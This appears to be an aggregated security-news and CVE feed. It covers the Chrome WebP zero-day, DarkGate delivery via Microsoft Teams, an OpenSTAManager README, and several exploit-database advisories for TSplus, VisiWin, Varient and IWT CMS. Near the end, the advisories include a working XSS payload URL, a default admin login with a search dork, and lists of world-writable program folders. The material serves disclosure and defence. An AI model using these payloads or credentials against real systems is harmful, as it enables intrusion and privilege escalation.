Categories: Exploits and vulnerabilities
Categories: News
Tags: Google

Tags:  Chrome

Tags:  CVE-2023-4863

Tags:  WebP

Tags:  buffer overflow

Tags:  116.0.5845.187/.188 

Chrome users are being urged to patch a critical vulnerability for which an exploit is available.



(Read more...)




The post Update Chrome now! Google patches critical vulnerability being exploited in the wild  appeared first on Malwarebytes Labs.

Google has released an update for Chrome Desktop which includes one critical security fix. There is an active exploit for the patched vulnerability, according to Google, which means cybercriminals are aware of the vulnerability and are using it.

If you’re a Chrome user on Windows, Mac, or Linux, you should update as soon as possible.

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong—such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. And now would be a good time, given the severity of the vulnerabilities in this batch. My preferred method is to have Chrome open the page _chrome://settings/help_ which you can also find by clicking **Settings > About Chrome**.

If there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.

After the update, the version should be 116.0.5845.187 for Mac and Linux, and 116.0.5845.187/.188 for Windows, or later.

**The vulnerability**

Google never gives out a lot of information about vulnerabilities, for obvious reasons. Access to bug details and links may be kept restricted until a majority of users are updated with a fix. However, from the update page we can learn a few things.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The zero-day patched in this update is listed as:

CVE-2023-4863: a heap buffer overflow in WebP, also described as a vulnerability that resides in the WebP image format which could lead to arbitrary code execution or a crash.

A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.

The heap is an area of memory made available use by the program. The program can request blocks of memory for its use within the heap. In order to allocate a block of some size, the program makes an explicit request by calling the heap allocation operation.

Credit for reporting the vulnerability was given to Apple Security Engineering and Architecture (SEAR) and The Citizen Lab at The University of Torontoʼs Munk School on 2023-09-06. The fact that this happens to coincide with a report by CitizenLab about two Apple vulnerabilities that used by the NSO group to drop the Pegasus spyware, seems too much to be a coincidence.

Add the fact that both Apple CVE-2023-41064 and  Chrome CVE-2023-4863 are based on image processing and we feel comfortable saying that these two vulnerabilities are very, very likely to be related.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Update Chrome now! Google patches critical vulnerability being exploited in the wild 

Categories: Business
Categories: News
Tags: Microsoft Teams

Tags:  DarkGate

Tags:  Loader

Tags:  Trojan

Tags:  Sharepoint

Tags:  AutoIt

Researchers have found a new distribution method for the DarkGate Loader which circumvents the security features in Microsoft Teams.



(Read more...)




The post Microsoft Teams used to deliver DarkGate Loader malware appeared first on Malwarebytes Labs.

Posted: September 12, 2023 by

Researchers have found a new method by which cybercriminals are spreading the DarkGate Loader malware. Until now, DarkGate was typically distributed via phishing emails. The malspam campaign used stolen email threads to lure victims into clicking a hyperlink, which downloaded the malware. But Malwarebytes also found DarkGate reloaded via malvertising and SEO poisoning campaigns.

A cybercriminal who goes by the handle RastaFarEye has been advertising DarkGate Loader on cybercrime forums since June 16, 2023. Once active, the malware can be used for several malicious activities like remote access, cryptocurrency mining, keylogging, clipboard stealing, and information stealing.

What’s new is that the researchers found evidence of a campaign using Microsoft Teams to deliver the DarkGate Loader.

> “On August 29, in the timespan from 11:25 to 12:25 UTC, Microsoft Teams chat messages were sent from two external Office 365 accounts compromised prior to the campaign. The message content aimed to social engineer the recipients into downloading and opening a malicious file hosted remotely.”

The distributed link initially points to a traffic distribution system (TDS). If the requirements set by the attacker are met, the TDS will redirect the victim user to the final payload URL for the MSI download. When the user opens the downloaded MSI file, the DarkGate infection is triggered.

The download locations observed in the Teams attacks were sharepoint.com URLs hosting .zip files with names like "Changes to the vacation schedule.zip."  The ZIP file contains a malicious LNK file (shortcut) posing as a PDF document: "Changes to the vacation schedule.pdf.lnk."

Clicking the shortcut executes a command line which triggers the download and execution of a renamed cURL (a command-line tool for getting or sending data including files using URL syntax) to download and execute Autoit3.exe and a bundled script. The pre-compiled AutoIT script hides the code in the middle of the file and, on execution, drops a new file that contains shellcode.

When the shellcode is run, the first thing it uses is the “byte by byte” technique aka called stacked strings, to create a new file: a Windows executable identified as DarkGate Loader.

**Protection**

Current Microsoft Teams security features such as Safe Attachments or Safe Links failed to detect or block this attack. BleepingComputer reported in June of 2023 that security researchers had found a simple way to deliver malware to an organization with Microsoft Teams, despite restrictions in the application for files from external sources. Microsoft Teams has client-side protections in place to block file delivery from external tenant accounts. But the restriction can be circumvented by changing the internal and external recipient ID in the POST request of a message, which ends up with Teams treating an external user as if it was an internal one.

The only way to prevent this attack vector within Microsoft Teams is to only allow Microsoft Teams chat requests from specific external domains. This may be troublesome in some environments since this means that all trusted external domains need to be whitelisted by an IT administrator.

Malwarebytes customers are protected against this attack as Malwarebytes blocks the C2 server hosting the downloaded files. Malwarebytes detects the LNK file and the scripts as Trojan.DarkGate.

_Malwarebytes blocks 5.188.87.58_

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

**RELATED ARTICLES**

Microsoft Teams used to deliver DarkGate Loader malware

A reflected cross-site scripting (XSS) vulnerability in DevCode OpenSTAManager versions 2.4.24 to 2.4.47 may allow a remote attacker to execute arbitrary JavaScript in the web browser of a victim by injecting a malicious payload into the 'error' and 'error_description' parameters of 'oauth2.php'.

    

Il gestionale OpenSTAManager è un software open-source e web based, sviluppato dall'azienda informatica DevCode di Este per gestire ed archiviare il servizio di assistenza tecnica e la relativa fatturazione. Il nome del progetto deriva dalla parziale traduzione in inglese degli elementi principali che lo compongono: la natura open-source e il suo obiettivo quale Gestore del Servizio Tecnico di Assistenza.

Un software gestionale, identificato nell'insieme degli applicativi che automatizzano i processi di gestione all'interno delle aziende, appartiene solitamente a una specifica categoria del settore, specializzata negli ambiti di:

*   Gestione della contabilità;
*   Gestione del magazzino;
*   Gestione e ausilio della produzione;
*   Gestione e previsione dei budget aziendali;
*   Gestione ed analisi finanziaria.

Secondo questa definizione, OpenSTAManager riesce a generalizzare al proprio interno le funzionalità caratteristiche della contabilità e della gestione del magazzino, presentando inoltre moduli piuttosto avanzati e destinati a complementare l'attività aziendale in relazione agli interventi di assistenza della realtà lavorativa in oggetto.

La documentazione ufficiale è disponibile all'indirizzo https://docs.openstamanager.com/.

*   Requisiti
*   Installazione
    *   Versioni
    *   Build
    *   Strumenti di sviluppo e debug
*   Perché software open-source
*   Community
*   Contribuire
*   Sviluppatori
*   Licenza

**Requisiti**

L'installazione del gestionale richiede la presenza di un server web con abilitato il DBMS MySQL e il linguaggio di programmazione PHP.

PHP

EOL

Supportato

8.1

25/11/2024

❌

8.0

26/11/2023

✔️

7.4

28/11/2022

✔️

7.3

06/12/2021

✔️

7.2

30/11/2020

❌

MYSQL

EOL

Supportato

8.0

01/04/2026

✔️

5.7

21/10/2023

✔️

5.6

05/02/2021

❌

Per ulteriori informazioni sui pacchetti che forniscono questi elementi di default, visitare la sezione Installazione della documentazione.

**Installazione rapida**

git clone https://github.com/devcode-it/openstamanager.git
cd openstamanager

# Download di composer da https://getcomposer.org/download/

yarn develop-OSM

**Installazione**

Per procedere all'installazione è necessario seguire i seguenti punti:

1.  Scaricare una release ufficiale del progetto.
    
2.  Creare una cartella (ad esempio openstamanager) nella root del server web installato ed estrarvi il contenuto della release scaricata. Il percorso della cartella root del server varia in base al software in utilizzo:
    
    *   LAMP (/var/www/html)
    *   XAMPP (C:/xampp/htdocs per Windows, /opt/lampp/htdocs/ per Linux, /Applications/XAMPP/htdocs/ per MAC)
    *   WAMP (C:\wamp\www)
    *   MAMP (C:\MAMP\htdocs per Windows, /Applications/MAMP/htdocs per MAC)
3.  Creare un database vuoto (tramite PHPMyAdmin o riga di comando).
    
4.  Accedere a http://localhost/openstamanager dal vostro browser.
    
5.  Inserire i dati di configurazione per collegarsi al database.
    
6.  Procedere all'installazione del software, cliccando sul pulsante **Installa**.
    

**Attenzione**: è possibile che l'installazione richieda del tempo. Si consiglia pertanto di attendere almeno qualche minuto senza alcun cambiamento nella pagina di installazione (in particolare, della progress bar presente) prima di cercare una possibile soluzione nelle discussioni del forum o nella sezione dedicata.

**Versioni**

Per mantenere un elevato grado di trasparenza riguardo al ciclo delle release, seguiamo le linee guida Semantic Versioning (SemVer) per definire le versioni del progetto. Per vedere tutte le versioni disponibili al download, visitare la pagina relativa su GitHub (per versioni precedenti alla 2.3, visitare SourceForge).

Nel caso utilizziate il programma per uso commerciale, si consiglia di scaricare le release disponibili nel sito ufficiale del progetto (https://www.openstamanager.com), evitando di utilizzare direttamente il codice della repository. Se siete inoltre interessati a supporto e assistenza professionali, li potete richiedere nella sezione dedicata.

**Build**

Nel caso si stia utilizzando la versione direttamente ottenuta dalla repository di GitHub, è necessario eseguire i seguenti comandi da linea di comando per completare le dipendenze PHP (tramite Composer) e gli assets (tramite Yarn) del progetto.

php composer.phar install
yarn global add gulp
yarn install
gulp

In alternativa alla sequenza di comandi precedente, è possibile utilizzare il seguente comando (richiede l'installazione di GIT e Yarn, oltre che l'inserimento dell'archivio composer.phar nella cartella principale del progetto):

Per ulteriori informazioni, visitare le sezioni Assets e Framework della documentazione.

**Strumenti di sviluppo e debug**

Consigliamo di installare psalm e configurarlo nel proprio IDE se supportato, in modo che vengano eseguiti ulteriori controlli automatici sul codice scritto.

E' già configurato su **composer** l'inclusione di PHP-CS-Fixer, uno strumento che permette di formattare in modo uniforme il codice scritto. Si può configurare nel proprio IDE se supportato. Il percorso dell'eseguibile è vendor/bin/php-cs-fixer.

**Perché software open-source**

Il progetto è un software open-source perché permette agli utilizzatori di studiarne il funzionamento ed adattarlo alle proprie esigenze; inoltre, in ambito commerciale, non obbliga l'utilizzatore ad essere legato allo stesso fornitore di assistenza.

In questo modo è possibile ottenere un'ulteriore garanzia sul funzionamento del software, poiché chiunque ne abbia le capacità può verificarlo, escludendo mancanze in relazione alla sicurezza e alla privacy dei dati (caratteristica che il software proprietario non può offrire).

**Community**

La community è una componente importante in un progetto open-source, perché mette in contatto utenti e programmatori tra di loro e permette pertanto l'individuazione di soluzioni innovative e migliori.

Siamo presenti su Facebook, Twitter, YouTube e Mastodon e il nostro forum ufficiale è disponibile all'indirizzo https://forum.openstamanager.com, dove potete segnalare i vostri problemi e soddisfare le vostre curiosità nelle sezioni più adeguate.

**Contribuire**

Per poter contribuire ed eseguire i test automatici, si consiglia di seguire le indicazioni descritte all'interno della documentazione ufficiale.

Se volete contribuire attivamente con semplici migliorie o correzioni potete cercare tra le issue per i nuovi contributori.

**Bounty Program**

Potresti trovare degli issue contrassegnati con il label **bountysource**. Questo significa che è disponibile una ricompensa per chi risolverà l'issue secondo i criteri descritti all'interno. Devi creare innanzitutto un account su BountySource.com. Successivamente, il funzionamento sarà il seguente:

*   esegui un fork del repository
*   risolvi l'issue
*   invia una pull request

Verificheremo se la pull request soddisferà i requisiti e, una volta approvata, provvederemo ad accreditare la ricompensa nel tuo account di BountySource.

**Licenza**

Questo progetto è tutelato dalla licenza **GPL 3**.

CVE-2023-38878: GitHub - devcode-it/openstamanager: Il software gestionale open source per l'assistenza tecnica e la fatturazione

In onCreate of WindowState.java, there is a possible way to launch a background activity due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

)\]}' { "commit": "7428962d3b064ce1122809d87af65099d1129c9e", "tree": "1deeadc22093f2abd0eb83df703d39bb3ebd04d5", "parents": \[ "375227708b825b70a1b50f0feb0355036d0058fb" \], "author": { "name": "Achim Thesmann", "email": "achim@google.com", "time": "Tue May 23 00:26:33 2023 +0000" }, "committer": { "name": "Android Build Coastguard Worker", "email": "android-build-coastguard-worker@google.com", "time": "Fri Jul 14 17:30:03 2023 +0000" }, "message": "Ignore virtual presentation windows - RESTRICT AUTOMERGE\\n\\nWindows of TYPE\_PRESENTATION on virtual displays should not be counted\\nas visible windows to determine if BAL is allowed.\\n\\nTest: manual test, atest BackgroundActivityLaunchTest\\nBug: 264029851, 205130886\\n(cherry picked from https://googleplex-android-review.googlesource.com/q/commit:4c40b187cd5277c27d20758c675865bf89180c7a)\\n(cherry picked from https://googleplex-android-review.googlesource.com/q/commit:5bf9607bec3f1224158cfcff7dd91ac558b46c0f)\\nMerged-In: I08b16ba1c155e951286ddc22019180cbd6334dfa\\nChange-Id: I08b16ba1c155e951286ddc22019180cbd6334dfa\\n", "tree\_diff": \[ { "type": "modify", "old\_id": "4c32edc6d709debe9792f88c5680652a38d4c5ce", "old\_mode": 33188, "old\_path": "services/core/java/com/android/server/wm/WindowState.java", "new\_id": "8a14c93c1d3844e8fe9a705f688ef2934404b4d9", "new\_mode": 33188, "new\_path": "services/core/java/com/android/server/wm/WindowState.java" } \] }

CVE-2023-35674

An issue was discovered in TSplus Remote Access through 16.0.2.14. Credentials are stored as cleartext within the HTML source code of the login page.

    # Exploit Title: TSPlus 16.0.0.0 - Remote Work Insecure Credential storage# Date: 2023-08-09# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia# Vendor Homepage: https://tsplus.net/# Version: Up to 16.0.0.0# Tested on: Windows# CVE : CVE-2023-31069With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single sign-on web portal and remote desktop gateway that enables users to remotely access the console session of their office PC.It is possible to create a custom web portal login page which allows a user to login without providing their credentials.However, the credentials are stored in an insecure manner since they are saved in cleartext, within the html login page.This means that everyone with an access to the web login page, can easely retrieve the credentials to access to the application by simply looking at the html code page.This is a code snippet extracted by the source code of the login page (var user and var pass):   // --------------- Access Configuration ---------------   var user = "Admin";                         // Login to use when connecting to the remote server (leave "" to use the login typed in this page)   var pass = "SuperSecretPassword";           // Password to use when connecting to the remote server (leave "" to use the password typed in this page)   var domain = "";                            // Domain to use when connecting to the remote server (leave "" to use the domain typed in this page)   var server = "127.0.0.1";                   // Server to connect to (leave "" to use localhost and/or the server chosen in this page)   var port = "";                              // Port to connect to (leave "" to use localhost and/or the port of the server chosen in this page)   var lang = "as_browser";                    // Language to use   var serverhtml5 = "127.0.0.1";              // Server to connect to, when using HTML5 client   var porthtml5 = "3389";                     // Port to connect to, when using HTML5 client   var cmdline = "";                           // Optional text that will be put in the server's clipboard once connected   // --------------- End of Access Configuration ---------------

CVE-2023-31069: TSPlus 16.0.0.0 Insecure Credential Storage ≈ Packet Storm

An issue was discovered in TSplus Remote Access through 16.0.2.14. There are Full Control permissions for Everyone on some directories under %PROGRAMFILES(X86)%\TSplus\UserDesktop\themes.

    # Exploit Title: TSplus 16.0.0.0 - Remote Work Insecure Files and Folders Permissions
    # Date: 2023-08-09
    # Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
    # Vendor Homepage: https://tsplus.net/
    # Version: Up to 16.0.0.0
    # Tested on: Windows
    # CVE : CVE-2023-31068
    
    With TSPlus Remote Work (v. 16.0.0.0) you can create a secure single 
    sign-on web portal and remote desktop gateway that enables users to 
    remotely access the console session of their office PC.
    The solution comes with an embedded web server to allow remote users to 
    easely connect remotely.
    However, insecure file and folder permissions are set, and this could 
    allow a malicious user to manipulate file content (e.g.: changing the 
    code of html pages or js scripts) or change legitimate files (e.g. 
    Setup-RemoteWork-Client.exe) in order to compromise a system or to gain 
    elevated privileges.
    
    This is the list of insecure files and folders with their respective 
    permissions:
    
    Permission: Everyone:(OI)(CI)(F)
    
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\prints
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\downloads\shared
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\js
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\locales
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\html5\own
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\des
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\topmenu
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\imgs\key\parts
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\img
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\software\java\third
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\img\cp
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\img\srv
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\third\images
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\third\images\bramus
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\var\log
    
    -------------------------------------------------------------------------------------------
    
    Permission: Everyone:(F)
    
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\robots.txt
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\hb.exe.config
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\cgi-bin\remoteapp\index.html
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\common.js
    C:\Program Files (x86)\TSplus-RemoteWork\Clients\www\download\lang.js
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\download\Setup-RemoteWork-Client.exe
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\jwwebsockify.jar
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\jwres\web.jar
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitlist.html
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\html5\own\exitupload.html
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\index.html
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\img\index.html
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\img\port.bin
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\third\jws.js
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\third\sha256.js
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\java\third\js\prototype\prototype.js
    C:\Program Files 
    (x86)\TSplus-RemoteWork\Clients\www\software\js\jquery.min.js

CVE-2023-31068: OffSec’s Exploit Database Archive

An issue was discovered in Inosoft VisiWin 7 through 2022-2.1 (Runtime RT7.3 RC3 20221209.5). The "%PROGRAMFILES(X86)%\INOSOFT GmbH" folder has weak permissions for Everyone, allowing an attacker to insert a Trojan horse file that runs as SYSTEM.

    # Exploit Title: Inosoft VisiWin 7 2022-2.1 - Insecure Folders Permissions Privilege Escalation# Date: 2023-08-09# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia# Vendor Homepage: https://www.inosoft.com/# Version: Up to 2022-2.1 (Runtime RT7.3 RC3 20221209.5)# Tested on: Windows# CVE: CVE-2023-31468Inosoft VisiWin is a completely open system with a configurable range of functions. It combines all features of classic HMI software with unlimited programming possibilities.The installation of the solution will create insecure folder, and this could allow a malicious user to manipulate file content or change legitimate files (e.g., VisiWin7.Server.Manager.exe which runs with SYSTEM privileges) to compromise a system or to gain elevated privileges.This is the list of insecure files and folders with their respective permissions:C:\>icacls "C:\Program Files (x86)\INOSOFT GmbH"C:\Program Files (x86)\INOSOFT GmbH BUILTIN\Administrators:(OI)(CI)(F)                                     Everyone:(OI)(CI)(F)                                     NT AUTHORITY\SYSTEM:(OI)(CI)(F)Successfully processed 1 files; Failed processing 0 filesC:\>--------------------------------------------------------------------------------------------------------------------------------------------------------C:\>icacls "C:\Program Files (x86)\INOSOFT GmbH\VisiWin7\Runtime\VisiWin7.Server.Manager.exe"C:\Program Files (x86)\INOSOFT GmbH\VisiWin 7\Runtime\VisiWin7.Server.Manager.exe BUILTIN\Administrators:(I)(F)                                                                                    Everyone:(I)(F)                                                                                    NT AUTHORITY\SYSTEM:(I)(F)Successfully processed 1 files; Failed processing 0 filesC:\>

CVE-2023-31468: Inosoft VisiWin 7 2022-2.1 Insecure Permissions

An issue was discovered in TSplus Remote Access through 16.0.2.14. There are Full Control permissions for Everyone on some directories under %PROGRAMFILES(X86)%\TSplus\Clients\www.

    # Exploit Title: TSplus 16.0.2.14 - Remote Access Insecure Files and Folders Permissions
    # Date: 2023-08-09
    # Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia
    # Vendor Homepage: https://tsplus.net/
    # Version: Up to 16.0.2.14
    # Tested on: Windows
    # CVE : CVE-2023-31067
    
    TSplus Remote Access (v. 16.0.2.14) is an alternative to Citrix and 
    Microsoft RDS for remote desktop access and Windows application 
    delivery. Web-enable your legacy apps, create SaaS solutions or remotely 
    access your centralized corporate tools and files.
    The TSplus Remote Access solution comes with an embedded web server to 
    allow remote users to easely connect remotely.
    However, insecure file and folder permissions are set and this could 
    allow a malicious user to manipulate file content (e.g.: changing the 
    code of html pages or js scripts) or change legitimate files (e.g. 
    Setup-VirtualPrinter-Client.exe) in order to compromise a system or to 
    gain elevated privileges.
    
    This is the list of insecure files and folders with their respective 
    permissions:
    Everyone:(OI)(CF)(F) and Everyone(F)
    Permission: Everyone:(OI)(CI)(F)
    
    C:\Program Files (x86)\TSplus\Clients\www
    C:\Program Files (x86)\TSplus\Clients\www\addons
    C:\Program Files (x86)\TSplus\Clients\www\ConnectionClient
    C:\Program Files (x86)\TSplus\Clients\www\downloads
    C:\Program Files (x86)\TSplus\Clients\www\prints
    C:\Program Files (x86)\TSplus\Clients\www\RemoteAppClient
    C:\Program Files (x86)\TSplus\Clients\www\software
    C:\Program Files (x86)\TSplus\Clients\www\var
    C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\remoteapp
    C:\Program Files (x86)\TSplus\Clients\www\downloads\shared
    C:\Program Files (x86)\TSplus\Clients\www\software\java
    C:\Program Files (x86)\TSplus\Clients\www\software\js
    C:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres
    C:\Program Files (x86)\TSplus\Clients\www\software\html5\locales
    C:\Program Files (x86)\TSplus\Clients\www\software\html5\imgs\topmenu
    C:\Program Files (x86)\TSplus\Clients\www\software\html5\imgs\key\parts
    C:\Program Files (x86)\TSplus\Clients\www\software\java\img
    C:\Program Files (x86)\TSplus\Clients\www\software\java\third
    C:\Program Files (x86)\TSplus\Clients\www\software\java\img\cp
    C:\Program Files (x86)\TSplus\Clients\www\software\java\img\srv
    C:\Program Files (x86)\TSplus\Clients\www\software\java\third\images
    C:\Program Files (x86)\TSplus\Clients\www\software\java\third\js
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\java\third\images\bramus
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\java\third\js\prototype
    C:\Program Files (x86)\TSplus\Clients\www\var\log
    C:\Program Files (x86)\TSplus\UserDesktop\themes
    C:\Program Files (x86)\TSplus\UserDesktop\themes\BlueBar
    C:\Program Files (x86)\TSplus\UserDesktop\themes\Default
    C:\Program Files (x86)\TSplus\UserDesktop\themes\GreyBar
    C:\Program Files (x86)\TSplus\UserDesktop\themes\Logon
    C:\Program Files (x86)\TSplus\UserDesktop\themes\MenuOnTop
    C:\Program Files (x86)\TSplus\UserDesktop\themes\Seamless
    C:\Program Files (x86)\TSplus\UserDesktop\themes\ThinClient
    C:\Program Files (x86)\TSplus\UserDesktop\themes\Vista
    
    ------------------------------------------------------------------------------
    
    Permission: Everyone:(F)
    
    C:\Program Files (x86)\TSplus\Clients\www\all.min.css
    C:\Program Files (x86)\TSplus\Clients\www\custom.css
    C:\Program Files (x86)\TSplus\Clients\www\popins.css
    C:\Program Files (x86)\TSplus\Clients\www\robots.txt
    C:\Program Files 
    (x86)\TSplus\Clients\www\addons\Setup-VirtualPrinter-Client.exe
    C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\hb.exe.config
    C:\Program Files 
    (x86)\TSplus\Clients\www\cgi-bin\SessionPrelaunch.Common.dll.config
    C:\Program Files (x86)\TSplus\Clients\www\cgi-bin\remoteapp\index.html
    C:\Program Files (x86)\TSplus\Clients\www\RemoteAppClient\index.html
    C:\Program Files (x86)\TSplus\Clients\www\software\common.css
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\html5\jwres\jwwebsockify.jar
    C:\Program Files (x86)\TSplus\Clients\www\software\html5\jwres\web.jar
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\html5\own\exitlist.html
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\html5\own\exitupload.html
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\html5\own\getlist.html
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\html5\own\getupload.html
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\html5\own\postupload.html
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\html5\own\uploaderr.html
    C:\Program Files (x86)\TSplus\Clients\www\software\java\index.html
    C:\Program Files (x86)\TSplus\Clients\www\software\java\img\index.html
    C:\Program Files (x86)\TSplus\Clients\www\software\java\img\port.bin
    C:\Program Files (x86)\TSplus\Clients\www\software\java\third\jws.js
    C:\Program Files (x86)\TSplus\Clients\www\software\java\third\sha256.js
    C:\Program Files 
    (x86)\TSplus\Clients\www\software\java\third\js\prototype\prototype.js
    C:\Program Files (x86)\TSplus\Clients\www\software\js\jquery.min.js

CVE-2023-31067: OffSec’s Exploit Database Archive

Varient News Magazine Script version 1.3.0 suffers from an ignored default credential vulnerability.

    ======================================================================================================================================| # Title     : Varient News Magazine Script V1.3.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro)                                                                                          || # Vendor    : https://varient.codingest.com/                                                                                       |  | # Dork      : "Varient - News Magazine - Varient"                                                                                  |======================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] Use Admin : admin@gmail.com & Pass : 1234[+] http://127.0.0.1/wwwmafrxyz/adminGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Varient News Magazine Script 1.3.0 Insecure Settings

IWT Imagine CMS version 1.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : IWT Imagineِ CMS v1.0 XSS Vulnerability                                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : http://imaginewebtech.com                                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /photo-gallery.html?id=1'<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] https://127.0.0.1wwsanklechain/photo-gallery.html?id=1%27%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#windows